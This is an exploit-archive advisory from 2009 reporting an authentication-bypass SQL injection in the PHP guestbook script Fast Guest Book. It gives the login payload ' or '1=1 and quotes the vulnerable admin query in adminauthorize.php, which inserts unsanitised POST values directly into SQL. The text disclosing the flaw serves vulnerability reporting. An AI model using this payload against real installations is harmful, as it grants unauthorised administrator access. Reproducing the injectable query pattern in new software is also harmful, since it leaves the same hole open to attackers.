[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-11
# Author : Moudi
# Previous Title : Joomla com_newsflash (id) Remote SQL Injection Vulnerability
# Next Title : DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================

==============================================================================
    Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

	[??] Script:             [ Fast Guest Book ]
	[??] Language:           [ PHP ]
	[??] Website:            [ http://fastcreators.com/products/guestbook/download.php ]
	[??] Founder:            [ Moudi <m0udi@9.cn> ]
        [??] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
        [??] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[??] ' or '1=1

===[ BUG ]===	

        [??] Bug In adminauthorize.php

            $query = "select * from admin where userid='{$_POST['uname']}' AND
            pass='{$_POST['pass']}'";



Author: Moudi

###########################################################################

# www.Syue.com [2009-01-11]